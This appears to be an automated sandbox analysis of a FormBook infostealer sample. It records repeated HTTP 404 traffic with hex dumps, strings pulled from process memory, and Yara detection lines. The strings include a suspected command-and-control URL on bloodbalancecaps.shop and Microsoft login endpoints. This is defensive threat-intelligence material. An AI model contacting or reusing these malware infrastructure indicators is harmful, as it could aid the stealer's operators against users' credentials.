75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:23:12 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:23:15 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2Be1uRK20CLkmmMKiytTNa0XbxDuiJ1hewl2q0kmc9ZEfYgSVMOgrdDOMAn5uZP2pEF1StGsa%2FEao2bRiIUbEKRRTj1jWQsFIDQvwsWe%2FDv%2B%2FIRsqZIyys%2Fq1Ip2PsA7%2B65DPq1pspQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e0446b27c445-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=792&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YmBwVoSQC171dnm6cY8gPxeQFzpNtkhvQJL%2FKbLB4CHkLi7Vtg0ohNOtOy79yj2PUh8J1fFw9VgH8RqM7QUnWz8Fu%2BGf6shnfqTEksWJan%2FzV%2BcgJsEi1duR6Aym76MhmKyDvXVxRlk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e05578385e6a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1LLDWAuj1tGb4tlsIjo1zim4JJi11Ajfi0xIg62lVg4ZxyrI%2BwboB2Oi1PLdiv13A7Wjspr2TKkEd6qrvF%2BauxzDq9SEEto%2BXybNRxqm2Qz41AVB5x6%2B0qOeTBPAIiDTRO%2BUlsKQVk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e065ea677c94-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1953&rtt_var=976&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1829&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 19
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siPmq2UDGReQJdfjNvaTJJC5uVCwIPzIA0ubei6FN3TGEhLOCiAdW4ZHaX3RIcOt7I8DiYuuju6FaYxiklNIhGpuMFy56qBI0ZTXk5vM37h8m0aADqezIYhBorYL45jh5mbMNm%2ByDMk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e076fa104239-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:37 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004D50000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000004630000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72
                Source: SW_5724.exe, 00000000.00000002.2082673604.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: SW_5724.exe, 00000000.00000002.2082673604.0000000002D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: BmUrsTIvMw.exe, 0000000B.00000002.4517476095.00000000050E4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop
                Source: BmUrsTIvMw.exe, 0000000B.00000002.4517476095.00000000050E4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop/qimy/
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004708000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000003FE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004708000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000003FE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 0000000A.00000003.2628909662.0000000007619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4516139537.000000000489A000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000430C000.00000004.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000417A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
